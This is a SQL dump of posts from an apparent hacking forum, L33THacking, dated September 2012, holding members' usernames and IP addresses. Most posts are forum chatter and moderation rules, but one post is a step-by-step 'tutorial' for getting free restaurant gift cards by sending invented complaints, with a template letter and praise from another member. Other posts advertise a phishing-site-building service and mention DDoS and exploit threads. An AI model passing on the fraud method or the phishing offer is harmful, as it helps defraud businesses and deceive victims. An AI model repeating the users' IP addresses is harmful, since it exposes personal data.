`visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1499', '319', '1497', '3', 'RE: [Bug] Gray/Grey Stars are bugged', '0', '1', 't3h jok3r', '1346700417', 'LMAO. It\'s not a bug and they [b]DO[/b] exist in the database. Solved>Closed', '72.229.164.105', '1223009385', '1', '0', '1', '1346700450', '1', '9af5f5c2d036dbc3dfdf6eb2cfed0156', '0', '1346700450'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1516', '325', '1515', '7', 'RE: Total users online', '0', '82', 'iTzIpod', '1346712859', 'I remember our last record was 27 or so. And then it was 29 or something and now, it is 31. Bravo :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c03acad57307afb2b590552750d7cc83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1517', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346716105', 'I agree with Apathy; almost everyone schools are starting not just that some people even have community service. I won\'t demote you but you can check back on LH at night, I\'m sure people are free in the night.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '36ab82d033b04746d7f006ec4b4b0456', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1501', '320', '0', '34', 'Fashion Dream Signature Tutorial', '0', '82', 'iTzIpod', '1346702440', '[img]http://fc02.deviantart.net/fs24/f/2007/332/0/c/fashion_dream_by_sanderrednas.png[/img] Credits: SandeRRednaS Enjoy! Post results below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e70c92251b4461a0b5e4cf4219fea8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1502', '321', '0', '34', 'Full Signature Tutorial', '0', '82', 'iTzIpod', '1346702634', '[img]http://fc07.deviantart.net/fs18/f/2007/130/7/7/Full_Signature_Tutorial_by_Senthrax.jpg[/img] Credits: Senthrax Enjoy! Good luck making it. And also, post your results below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e8eb009980cacc57e5343eb03d0b4c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1503', '322', '0', '34', 'Signature Tutorial', '0', '82', 'iTzIpod', '1346702729', '[img]http://fc02.deviantart.net/fs17/f/2007/208/7/f/Signature_Tutorial_by_Element1908.png[/img] Credits: Element1908 Enjoy. This one looks nice, I might post my own result. Post results below! Good luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b278faf17d480eeb5716a59966d9f471', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1504', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346702883', 'Wow.. Everytime I try this method, there is always that 1 Month XBL guy on HF. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e6d11af2c6edfad4e51f821a19bce3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1505', '323', '0', '7', 'If I go inactive', '0', '82', 'iTzIpod', '1346704261', 'Hey LH, If I go inactive, that will be because I will be going back to school tomorrow (Tuesday, September 4 2012). I apologize for the inconvenience and if you need something, please feel free to add me on Skype or MSN. Or PM me. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd65e551ee6a321c0518508847763ebe8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1507', '316', '1480', '4', 'RE: Hello everyone.', '0', '2', 'Apathy', '1346708727', 'Welcome to the site. Enjoy your stay and hope to see you around.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '76f4aa7ade3ab0e7984b2d9bf78c2242', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1508', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '2', 'Apathy', '1346708817', 'Interesting idea but is there any specific thing?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'b3df3bb9324dbd3bbfc4db3274ac99e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1509', '320', '1501', '34', 'RE: Fashion Dream Signature Tutorial', '0', '2', 'Apathy', '1346708894', 'I was looking at this tut the other day o da. :3', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'eb4df1e2af5753a435637f66a1e38ee4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1510', '317', '1508', '61', 'RE: Unique\'s Purpose', '0', '61', 'NXK', '1346708983', '[quote=\'Apathy\' pid=\'1508\' dateline=\'1346708817\'] Interesting idea but is there any specific thing? [/quote] Is there any specific thing? ^ what? This group is for unique members who are special in there own way. Strive in something that not all the other normal members don\'t.', '99.253.65.17', '1677541649', '0', '0', '61', '1346709967', '1', '373fa6aee6fc558bcea74f65d4a15a83', '0', '1346709967'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1511', '323', '1505', '7', 'RE: If I go inactive', '0', '2', 'Apathy', '1346708988', 'You should not be going inactive if you are a mod. :3 School is starting for everyone as well. :/', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '41011922a8bc22d58bc0bd24d13a3067', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1512', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '82', 'iTzIpod', '1346709081', 'Sigh.. This user doesn\'t go on anymore.. Guess I can\'t get this method..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b54f40264ebb4524fe0e297a0a5dfc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1513', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346709348', 'Well t3h jok3r will demote me if it happens.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4a5fa562552350add2b16347ebda31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1514', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '67', 'HoverCatz', '1346710844', 'In my own way? Does (Extreme)-DDoS Count xD', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '549cd8f6a7c5de1e3c9e3b89be13ac1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1515', '325', '0', '7', 'Total users online', '0', '67', 'HoverCatz', '1346710974', 'Hey! Did we just beat the old record? [img]http://gyazo.com/bef3b17bda246f47ac67940956404360.png[/img]', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3fea5b2611cfea944eededdb619e700d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1518', '325', '1515', '7', 'RE: Total users online', '0', '1', 't3h jok3r', '1346716145', 'Wait we did. Thanks to everyone on LH for visiting L33THacking.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3a4a9f24b319bc6e249e251ea068bc7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1519', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346716259', '@t3h jok3r, I\'m sure I will get a lot of homework. And I mean a lot. Also, I gotta sleep early for school...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5c38a4ba237e1dea43302de8207e59e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1520', '326', '0', '16', '[TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1346716335', '[color=#FF0000][size=x-large][align=center]Free Restaurant Gift Ca.rds[/align][/size][/color] Okay, so this is probably the easiest Social Engineer I know,and it works 95% of the time. First pick the destination of the place where you want to eat, choose a moderately low price restaurant such as Olive Garden, Chile\'s, Applebee\'s, or anything along those lines. You\'re going to go to their website, and find the customer support part of the section. Email them saying that you didn\'t have great service when you had went last to the given destination. Try to acknowledge the fact that you are a constant customer who is loyal to the restaurant. Here\'s an example of what you should put. It\'s not the best it\'s just a little quick sloppy example. EX: \"I feel as if I should report this as I have been a loyal customer for years going several times a week. I had a dinner party for my son who had just turned 13, and the service was just horrible. The waiters were no help what-so-ever, and they were taking forever to take out the food. When the food had arrived everything was cold, and under cooked. I had spent well about $150 on food that was not satisfying at all\" You will have to enter in your phone number, and they usually reply within days. They\'ll send you an email saying that they apologize, and will refund you with a gift ca.rd for their next purchase. I\'ve done this before and was able to get a $50 Olive Garden gift ca.rd for my parents. There\'s a chance that you will get a phone call , but you can go ahead, and tell them \"That you\'re busy\" at the moment, and that [i]YOU\'LL [/i]call them back later. [b]Estimated arrival time:[/b] 5-7 days [b]How easy on a scale from 1-10:[/b] 2 [u]I\'ve tried this myself and I can say that it DOES work. [/u]', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'c8186ba496ec1d736d9fe36550522ba9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1521', '313', '1472', '52', 'RE: [VB.net Source] PayPal Cash System', '0', '1', 't3h jok3r', '1346716668', 'Isn\'t like to order stuff. EX: If you bought a booter program and you require more credits then you can purchase more credits through the program instead of going onto your browser, visiting PayPal.com, paying for it then waiting for the seller to provide you with more credits.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ffd913894ce55975903a46543f108871', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1522', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '82', 'iTzIpod', '1346717167', 'Seems legit. Nice tutorial =] Good luck to everyone that is going to try this', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdfcd93f6395a08b5418bd25d4a4ee22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1523', '323', '1505', '7', 'RE: If I go inactive', '0', '166', '2112', '1346717437', 'It\'s sad to see when school has to take up time to go on a forum, but in all honesty school helps you go a long way. So make sure to put school ahead of things.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'e082438dd444f8101f214950a0aa7eb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1524', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '82', 'iTzIpod', '1346717467', 'I don\'t think this user is active anymore.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c68822e0f7f9cad55f473383832afc2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1525', '323', '1519', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346717648', '[quote=\'iTzIpod\' pid=\'1519\' dateline=\'1346716259\'] @t3h jok3r, I\'m sure I will get a lot of homework. And I mean a lot. Also, I gotta sleep early for school... [/quote] If you are in US then I\'m sure you can\'t get much homework and when it comes to sleeping time then you\'re right we have to sleep early but around 9-10 is not bad.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd28ada7f084f9be4cd9bdef2bb7cb394', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1526', '316', '1480', '4', 'RE: Hello everyone.', '0', '166', '2112', '1346717839', 'Thank you, I\'m sure I will like it here.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '971317f87549d132571b515b67cd3018', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1527', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346717916', 'I don\'t live in US @t3h jok3r. And @2112, you\'re right. (:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3810ca89764ccb6b17e665cde09ad0a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1528', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '166', '2112', '1346717927', 'Would love to see this method if the user comes online again. Thank you.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '4641352c68b8d0f1d7be6420bc0a8341', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1529', '322', '1503', '34', 'RE: Signature Tutorial', '0', '166', '2112', '1346718131', 'These tutorials are as easy as they come. Thanks for this.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '0285eb44d37d999f86374dd0e938856c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1530', '316', '1480', '4', 'RE: Hello everyone.', '0', '82', 'iTzIpod', '1346718271', 'Oh. You changed your name. I thought you were a different member that was new. :p But you\'re still new xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccdd295f5d26e591371d46a024bf05fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1531', '322', '1529', '34', 'RE: Signature Tutorial', '0', '82', 'iTzIpod', '1346718534', '[quote=\'2112\' pid=\'1529\' dateline=\'1346718131\'] These tutorials are as easy as they come. Thanks for this. [/quote] No problem. Thanks for viewing my threads. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '15c085c35d1e2f9b88073af2f69f6689', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1532', '327', '0', '5', 'Staff Notice in threads', '0', '1', 't3h jok3r', '1346718727', 'When you guys edit someone elses thread and want to put a warning, then what I would recommend you to do is to use the mycode below and put up your notice. [code] [mod]MESSAGE[/mod] [/code] [b][u]Preview[/u][/b] [mod]Message[/mod] [u][b]Example of how to use in thread [/b][/u] [mod]This link has been removed, because this download contains a virus. -Staff[/mod] P.S: There should be no space between the code and the message. [b]EXAMPLE[/b] It should be like this [code] [mod]This is an example[/mod] [/code] Not like [code] [mod] test [/mod] [/code]', '72.229.164.105', '1223009385', '1', '0', '1', '1347482933', '1', '657511ec72c87c435f40f4508ac5166b', '0', '1347482933'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1533', '328', '0', '48', 'Mod Notice in threads', '0', '1', 't3h jok3r', '1346718764', 'When you guys edit someone elses thread and want to put a warning, then what I would recommend you to do is to use the mycode below and put up your notice. [code] [mod]MESSAGE[/mod] [/code] [b][u]Preview[/u][/b] [mod]Message[/mod] [u][b]Example of how to use in thread [/b][/u] [mod]This link has been removed, because this download contains a virus. -Staff[/mod] P.S: There should be no space between the code and the message. [b]EXAMPLE[/b] It should be like this [code] [mod]This is an example[/mod] [/code] Not like [code] [mod] test [/mod] [/code]', '72.229.164.105', '1223009385', '1', '0', '1', '1347482924', '1', 'eab696efa68259fdcfa3a7c8bd56546f', '0', '1347482924'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1534', '316', '1480', '4', 'RE: Hello everyone.', '0', '1', 't3h jok3r', '1346718817', 'Welcome to L33THacking. I also thought you were another new member.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '80b2742194a1376defcd7e26a1cd46d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1535', '127', '1524', '46', 'RE: Will make you a phisher website with theme you request.', '0', '1', 't3h jok3r', '1346725101', '[quote=\'iTzIpod\' pid=\'1524\' dateline=\'1346717467\'] I don\'t think this user is active anymore. [/quote] Then close down the thread???', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f60e35a334cf3afb0659ddf7d6d68716', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1536', '329', '0', '46', 'New phi$hing theme service', '0', '17', 'khade009', '1346725132', 'Recently vladjkes phi$hing theme service got shut down due to inactivity so I opened up my own theme service. Post below and PM me the site. I will not phi$h sites like google, youtube, facebook etc.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '25a41029092f126464f277258f95bde8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1537', '318', '1494', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '84', 'Thunder™', '1346735134', '[quote=\'iTzIpod\' pid=\'1494\' dateline=\'1346696391\'] I don\'t get it.. How do I register an account and start gambling me some money? O_o EDIT: Nevermind. So I made a Reserve Liberty account and now I want to start gambling some money.. But I don\'t have money on my account so I can\'r gamble. -_- What do I do? [/quote] U can Earn it or if u have money in paypal u can exchange it.', '111.91.75.137', '1868254089', '0', '0', '0', '0', '1', 'c95ccea509bf729db195b17abc07cb56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1538', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '82', 'iTzIpod', '1346759627', 'Seems cool. I will try it out soon. Test: [mod]Le Testing [/mod]', '24.212.197.164', '416597412', '1', '0', '82', '1346794678', '1', '37de5031e41a3163d1227b8220ad00f4', '0', '1346794678'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1539', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '2', 'Apathy', '1346763908', 'Righty o. Will do.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'a334afbb939d26e6f559616d56ff0dc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1540', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '1', 't3h jok3r', '1346764374', 'Low Quality Posts [b]NOT[/b] allowed.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a61e2346ebfdd82102e7cacbe92dc606', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1541', '329', '1536', '46', 'RE: New phi$hing theme service', '0', '53', 'sirchamp', '1346764446', 'I cant pm you......Please fix that thanks', '188.155.56.90', '-1130678182', '1', '0', '53', '1346764546', '1', '1f4160cc984804c9580f3448e3813698', '0', '1346764546'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1542', '212', '1487', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1346765744', '[quote=\'iTzIpod\' pid=\'1487\' dateline=\'1346691089\'] [quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\'] So far, only the Unique group was added. Other group ideas were overlooked. Mr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website. [/quote] Oh alright. Thanks for making Unique Official! :D [/quote] No problem. Enjoy and hopefully this group can help L33THacking become a successful site.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8bd4a6c368993a0410926243b3f75bda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1543', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '53', 'sirchamp', '1346766658', 'Same by me bchkhackforums something XBL theres some key in it', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3ec5bd48500de848bc0694ff4134be72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1544', '330', '0', '7', 'Request Exchange', '0', '53', 'sirchamp', '1346767124', 'Hey guys I have a bit of money on paypal but I do not know any working exchange which exchanges from paypal to libertyreserve. I need someone wh0 pays me 50 cents to liberty reserve and I will pay him 60(!) cents to his paypal. So you will make 10 cents :D I hope somebody can help me :thinking: Or does anyone know a working method to exchange money from paypal to liberty reserve??', '188.155.56.90', '-1130678182', '1', '0', '53', '1346772421', '1', 'cab58acea1a44e501b77ace74c24650d', '0', '1346772421'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1545', '331', '0', '5', 'New Rules and Instructions v.5', '0', '1', 't3h jok3r', '1346767410', 'I go around many forums and MyBB Support sites daily and pick up new ideas etc. So I thought why not post new rules and instructions on a single thread so it\'s easy for staff and admins to catch up. This thread will be updated every time there\'s a new rule or instruction on something. [hr] All permanent banned members should be moved to the [b]closed[/b] group. Permanent bans include the following reasons. [list] [*] Proven Scammer [*] [bot] Spammer [*] Threat to L33THacking [*] Old inactive accounts [*] Stolen/Hack accounts [/list] Difference between banned and closed is that only temporary banned members should be moved to the banned group. People that we don\'t want to ever come back will be moved to the closed group. [hr] [b]Banning Multiple Accounts[/b] The account with most reports or most LQ account should be moved to the closed group. The most HQ account must be banned for [b]6 months[/b]. For staff; If you guys want to report 2+ multi accounting, then PM me an Admin then what the admin should do is merge all the users to the most HQ user also ban the HQ multi accounter for 6 months. How to merge users? http://l33thacking.com/showthread.php?tid=10 [hr] [b]Edit Post Lock[/b] I have added a new plugin. After a Moderator edits a post, the original poster is no longer allowed to edit their post. [hr] Not really a rule or instruction but a great update that I have been working on for 3 weeks. We now have SMTP Emailers. On account activations and email notifications users will receive 